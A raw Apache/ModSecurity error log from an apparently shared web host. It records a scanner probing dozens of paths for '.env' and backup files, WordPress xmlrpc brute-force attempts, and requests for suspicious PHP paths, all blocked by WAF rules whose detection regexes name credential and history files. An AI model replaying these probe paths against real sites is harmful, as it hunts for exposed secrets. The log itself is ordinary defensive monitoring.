[Tue May 26 13:47:32.871889 2026] [security2:error] [pid 555743:tid 555920] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/mail/.env"] [unique_id "ahVXHMjqAquC0YaxQjCjqQAAATk"]
[Tue May 26 13:47:33.168807 2026] [security2:error] [pid 555743:tid 555914] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/mailer/.env"] [unique_id "ahVXHcjqAquC0YaxQjCjsQAAATM"]
[Tue May 26 13:47:33.417752 2026] [security2:error] [pid 555743:tid 555981] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/nginx/.env"] [unique_id "ahVXHcjqAquC0YaxQjCjuAAAAXY"]
[Tue May 26 13:47:33.728673 2026] [security2:error] [pid 555743:tid 555890] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/public/.env"] [unique_id "ahVXHcjqAquC0YaxQjCjwAAAARs"]
[Tue May 26 13:47:33.744426 2026] [security2:error] [pid 544395:tid 544598] [client 136.37.154.171:38529] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXHRmrs7g3RMCdp8XtqAAAAEk"]
[Tue May 26 13:47:34.369147 2026] [security2:error] [pid 544395:tid 544598] [client 136.37.154.171:38529] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXHRmrs7g3RMCdp8XtqAAAAEk"]
[Tue May 26 13:47:34.369192 2026] [security2:error] [pid 544395:tid 544598] [client 136.37.154.171:38529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXHRmrs7g3RMCdp8XtqAAAAEk"]
[Tue May 26 13:47:35.311025 2026] [core:crit] [pid 555743:tid 555904] (13)Permission denied: [client 207.46.13.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:47:35.382556 2026] [security2:error] [pid 555743:tid 555934] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/site/.env"] [unique_id "ahVXH8jqAquC0YaxQjCj7QAAAUc"]
[Tue May 26 13:47:35.514743 2026] [security2:error] [pid 555743:tid 555899] [client 129.222.147.134:17956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXH8jqAquC0YaxQjCj8gAAASQ"]
[Tue May 26 13:47:35.514888 2026] [security2:error] [pid 555743:tid 555899] [client 129.222.147.134:17956] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXH8jqAquC0YaxQjCj8gAAASQ"]
[Tue May 26 13:47:36.048512 2026] [security2:error] [pid 555743:tid 555905] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/xampp/.env"] [unique_id "ahVXIMjqAquC0YaxQjCj_AAAASo"]
[Tue May 26 13:47:36.063198 2026] [security2:error] [pid 555743:tid 555931] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXH8jqAquC0YaxQjCj9QAAAUQ"]
[Tue May 26 13:47:36.308392 2026] [security2:error] [pid 555743:tid 555908] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/main/.env"] [unique_id "ahVXIMjqAquC0YaxQjCkAwAAAS0"]
[Tue May 26 13:47:36.583155 2026] [security2:error] [pid 555743:tid 555983] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/node_modules/.env"] [unique_id "ahVXIMjqAquC0YaxQjCkCgAAAXg"]
[Tue May 26 13:47:36.828345 2026] [security2:error] [pid 555743:tid 555946] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/kyc/.env"] [unique_id "ahVXIMjqAquC0YaxQjCkDwAAAVM"]
[Tue May 26 13:47:37.021687 2026] [core:crit] [pid 555743:tid 555942] (13)Permission denied: [client 207.46.13.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:47:37.161755 2026] [security2:error] [pid 555743:tid 555921] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXIcjqAquC0YaxQjCkHQAAATo"]
[Tue May 26 13:47:37.164084 2026] [security2:error] [pid 555743:tid 555873] [client 4.201.75.230:6089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/as.php"] [unique_id "ahVXIcjqAquC0YaxQjCkHgAAAQo"]
[Tue May 26 13:47:37.359567 2026] [autoindex:error] [pid 555743:tid 555916] [client 46.101.90.201:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:47:37.669060 2026] [core:error] [pid 555743:tid 555934] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:37.669083 2026] [core:error] [pid 555743:tid 555934] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:37.834515 2026] [security2:error] [pid 555743:tid 555950] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/prod/.env"] [unique_id "ahVXIcjqAquC0YaxQjCkNAAAAVc"]
[Tue May 26 13:47:37.907440 2026] [security2:error] [pid 544395:tid 544619] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXIRmrs7g3RMCdp8XtxgAAAF4"]
[Tue May 26 13:47:38.160603 2026] [security2:error] [pid 555743:tid 555879] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/.env.bak"] [unique_id "ahVXIsjqAquC0YaxQjCkPQAAARA"]
[Tue May 26 13:47:38.316372 2026] [autoindex:error] [pid 544395:tid 544648] [client 46.101.90.201:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:47:38.367035 2026] [security2:error] [pid 555743:tid 555952] [client 85.208.96.194:53146] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVXIsjqAquC0YaxQjCkRgAAAVk"]
[Tue May 26 13:47:38.367209 2026] [security2:error] [pid 555743:tid 555952] [client 85.208.96.194:53146] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVXIsjqAquC0YaxQjCkRgAAAVk"]
[Tue May 26 13:47:38.484412 2026] [security2:error] [pid 555743:tid 555907] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXIsjqAquC0YaxQjCkSQAAASw"]
[Tue May 26 13:47:38.985087 2026] [security2:error] [pid 555743:tid 555991] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXIsjqAquC0YaxQjCkVAAAAU8"]
[Tue May 26 13:47:39.298407 2026] [security2:error] [pid 555743:tid 555969] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXI8jqAquC0YaxQjCkXwAAAWo"]
[Tue May 26 13:47:39.529316 2026] [security2:error] [pid 555743:tid 555925] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/website/.env"] [unique_id "ahVXI8jqAquC0YaxQjCkZwAAAT4"]
[Tue May 26 13:47:39.761579 2026] [security2:error] [pid 555743:tid 555895] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/development/.env"] [unique_id "ahVXI8jqAquC0YaxQjCkaAAAASA"]
[Tue May 26 13:47:40.015949 2026] [security2:error] [pid 555743:tid 555986] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/backend/.env"] [unique_id "ahVXJMjqAquC0YaxQjCkcwAAAXs"]
[Tue May 26 13:47:40.257726 2026] [security2:error] [pid 555743:tid 555952] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/api/shared/config/.env"] [unique_id "ahVXJMjqAquC0YaxQjCkeAAAAVk"]
[Tue May 26 13:47:40.343941 2026] [security2:error] [pid 555743:tid 555881] [client 20.206.67.134:4977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahVXJMjqAquC0YaxQjCkewAAARI"], referer: www.google.com
[Tue May 26 13:47:40.344803 2026] [security2:error] [pid 555743:tid 555883] [client 20.206.67.134:4891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXJMjqAquC0YaxQjCkfQAAARQ"], referer: www.google.com
[Tue May 26 13:47:40.357049 2026] [security2:error] [pid 555743:tid 555968] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXI8jqAquC0YaxQjCkcgAAAWk"]
[Tue May 26 13:47:40.479301 2026] [security2:error] [pid 555743:tid 555888] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/api/shared/.env"] [unique_id "ahVXJMjqAquC0YaxQjCkiAAAARk"]
[Tue May 26 13:47:40.850909 2026] [security2:error] [pid 555743:tid 555890] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJMjqAquC0YaxQjCkkwAAARs"]
[Tue May 26 13:47:41.207204 2026] [security2:error] [pid 555743:tid 555916] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJcjqAquC0YaxQjCkogAAATU"]
[Tue May 26 13:47:41.339735 2026] [security2:error] [pid 555743:tid 555982] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXJMjqAquC0YaxQjCknQAAAXc"]
[Tue May 26 13:47:41.407597 2026] [security2:error] [pid 544395:tid 544592] [client 4.201.75.230:6112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-trackback.php"] [unique_id "ahVXJRmrs7g3RMCdp8Xt7gAAAEM"]
[Tue May 26 13:47:41.558945 2026] [security2:error] [pid 544395:tid 544556] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJRmrs7g3RMCdp8Xt8QAAAB8"]
[Tue May 26 13:47:41.631681 2026] [security2:error] [pid 555743:tid 555950] [client 20.206.67.134:1587] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahVXJMjqAquC0YaxQjCkegAAAVc"], referer: www.google.com
[Tue May 26 13:47:41.864405 2026] [security2:error] [pid 544395:tid 544598] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJRmrs7g3RMCdp8Xt-AAAAEk"]
[Tue May 26 13:47:42.138915 2026] [core:error] [pid 555743:tid 555938] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:42.138939 2026] [core:error] [pid 555743:tid 555938] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:42.189943 2026] [security2:error] [pid 555743:tid 555887] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCkugAAARg"]
[Tue May 26 13:47:42.343841 2026] [security2:error] [pid 555743:tid 555886] [client 20.206.67.134:4885] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVXJsjqAquC0YaxQjCkxQAAARc"]
[Tue May 26 13:47:42.371723 2026] [security2:error] [pid 555743:tid 555883] [client 20.206.67.134:1587] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCkwQAAARQ"], referer: www.google.com
[Tue May 26 13:47:42.544714 2026] [security2:error] [pid 555743:tid 555980] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCkzgAAAXU"]
[Tue May 26 13:47:42.818274 2026] [security2:error] [pid 555743:tid 555899] [client 106.192.248.115:60537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXJsjqAquC0YaxQjCk1QAAASQ"]
[Tue May 26 13:47:42.818432 2026] [security2:error] [pid 555743:tid 555899] [client 106.192.248.115:60537] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXJsjqAquC0YaxQjCk1QAAASQ"]
[Tue May 26 13:47:42.885749 2026] [security2:error] [pid 555743:tid 555995] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCk2wAAAYQ"]
[Tue May 26 13:47:43.059903 2026] [autoindex:error] [pid 555743:tid 555992] [client 146.56.199.139:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.aeromodellingconsultants.com
